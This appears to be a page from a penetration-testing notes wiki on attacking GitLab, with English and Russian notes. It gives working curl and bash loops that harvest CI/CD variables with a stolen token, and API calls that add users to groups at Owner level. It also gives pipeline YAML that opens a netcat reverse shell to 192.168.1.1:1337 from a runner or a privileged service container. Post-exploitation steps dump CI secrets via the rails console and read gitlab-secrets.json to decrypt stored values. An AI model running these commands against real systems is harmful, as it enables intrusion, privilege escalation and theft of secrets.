Gitlab

Gitlab checks

Search for secrets

GitHub - praetorian-inc/noseyparker: Nosey Parker is a command-line tool that finds secrets and sensitive information in textual data and Git history.GitHub

#Scan repo
docker run -v "$PWD":/scan ghcr.io/praetorian-inc/noseyparker:latest scan .
#Get results
docker run -v "$PWD":/scan ghcr.io/praetorian-inc/noseyparker:latest report

Reconnaissance

Gitlab Reconnaissance IntroductionEmbrace The Red

Check public repositories

curl "https://gitlab.com/api/v4/projects?visibility=public&per_page=100"" | jq '.[] | {name, path, web_url}'

membership=true — только проекты, где ты участник
per_page=100 — увеличивает количество результатов (GitLab по умолчанию возвращает 20)

Route /explore allow to go behind the login panel

Abusing GitLab token

Token prefixes

The following table shows the prefixes for each type of token.

Token name

Prefix

Personal access token

glpat-

OAuth Application Secret

gloas-

Impersonation token

glpat-

Project access token

glpat-

Group access token

glpat-

Deploy token

gldt- (Added in GitLab 16.7)

Runner authentication token

glrt- or glrtr- if created via registration token

CI/CD Job token

glcbt- • (Introduced in GitLab 16.8 behind a feature flag named prefix_ci_build_tokens. Disabled by default.) • (Generally available in GitLab 16.9. Feature flag prefix_ci_build_tokens removed.)

Trigger token

glptt-

Feed token

glft-

Incoming mail token

glimt-

GitLab agent for Kubernetes token

glagent-

GitLab session cookies

_gitlab_session=

SCIM Tokens

glsoat- • (Introduced in GitLab 16.8 behind a feature flag named prefix_scim_tokens. Disabled by default.) • (Generally available in GitLab 16.9. Feature flag prefix_scim_tokens removed.)

Feature Flags Client token

glffct-

Get variables from projects

define count pages and replace max page in seq. First take all projects id

for page in $(seq 0 110); do echo $page && curl -s --header "PRIVATE-TOKEN: <token>" "https://gitlab.example.com/api/v4/projects?per_page=100&page=$page" | jq ".[].id" >> gitlab-ids.txt; done

Then try get var

while IFS='' read -r LINE || [ -n "${LINE}" ]; do url="https://gitlab.example.com/api/v4/projects/$LINE"; vars=$(curl -s --header 'PRIVATE-TOKEN: token' $url/variables); [ ${#vars} -gt 5 ] && echo $vars > .tempvars && curl -s --header 'PRIVATE-TOKEN: token' $url | jq --slurpfile v .tempvars '{id: .id, git: .http_url_to_repo, vars: $v[0]}' >> gitlab-vars.txt; done <gitlab-ids.txt

Also try get gitlab-group vars (мне пока лень)

Abusing GitLab Runners

Abusing GitLab Runnersfrichetten.com

Script for steal tasks by requesting them faster than a real runner - https://github.com/Frichetten/gitlab-runner-research

Check projects access level

curl --header "PRIVATE-TOKEN: <token>" "https://gitlab.com/api/v4/projects?membership=true&per_page=100"

membership=true — только проекты, где ты участник
per_page=100 — увеличивает количество результатов (GitLab по умолчанию возвращает 20)

[
  {
    "id": 123,
    "name": "my-repo",
    "path": "my-repo",
    "permissions": {
      "project_access": {
        "access_level": 30  # 30 = Developer
      },
      "group_access": null
    }
  }
]

Уровни доступа:

10 — Guest (только чтение)
20 — Reporter (чтение + доступ к CI/CD)
30 — Developer (чтение + запись + запуск CI/CD)
40 — Maintainer (полный доступ, кроме удаления проекта)
50 — Owner (полный доступ)

Get current user

curl --header "Private-Token: <Token>" "https://gitlab.com/api/v4/user" | jq

Groups abuse

# Get groups
curl --header "Private-Token: <Token>" "https://gitlab.com/api/v4/groups?per_page=9999" | jq

# Check role in group
curl -s -H "Authorization: Bearer $TOKEN" \
  "$GITLAB_HOST/api/v4/groups/$GROUP_ID/members/$MY_USER_ID"

# Add user to group
## check what access_level you can grant
curl -s -X POST -H "Authorization: Bearer <Token>" --data \
  "user_id=<USER_TO_ADD_ID>&access_level=50" \
  "https://gitlab.com/api/v4/groups/$i/members" | jq
  
# Get group's runners
curl -s -H "Authorization: Bearer $TOKEN" \
  "$GITLAB/api/v4/groups/$GROUP_ID/runners"

CI Abuse

Exec code in runner

stages:
  - build
  
build-job:
  image: 
    name: python:3.11-alpine
  stage: build
  script:
    - nc 192.168.1.1 1337 -e /bin/sh
  tags:
    - runner-tag                        #Check tags of runners in project settings

Exec code in runner service

Services can also have privileged containers

stages:
  - build

build-job:
  image: docker:28.0.4-dind-alpine3.21
  services:
    - name: docker:28.0.4-dind-alpine3.21
      alias: docker
      command: ["nc", "192.168.1.1", "1337", "-e", "/bin/sh"]
  variables:
    DOCKER_HOST: tcp://docker:2375
    DOCKER_TLS_CERTDIR: ""        
  stage: build
  script:
    - echo waiting && sleep 999999999
  tags:
    - runner-tag                   #Check tags of runners in project settings

Postexploit

Get all ci_variables from filesystem gitlab instance.

Way 1. open gitlab-rails console

gitlab-rails console

then enter script

	Project.joins(:variables).find_each do |project|
	  puts "=" * 50
	  puts "PROJECT: #{project.full_path} (ID: #{project.id})"
	  puts "=" * 50
	  
	  project.variables.each do |var|
	    puts "Key: #{var.key}"
	    puts "Value: #{var.masked? ? '[MASKED]' : var.value}"
	    puts "Protected: #{var.protected?}"
	    puts "Masked: #{var.masked?}"
	    puts "Environment scope: #{var.environment_scope}"
	    puts "---"
	  end
	  puts "\n"
	end

Way 2. Read encrypted vars from db

gitlab-psql -U gitlab-psql -c 'select key, encrypted_value from ci_variables;'

read aes key for decryption

cat /etc/gitlab/gitlab-secrets.json

then decrypt it 😄 AES-256-CBC algo

PreviousDocker Escape NextKafka & Zookeeper

Last updated 4 days ago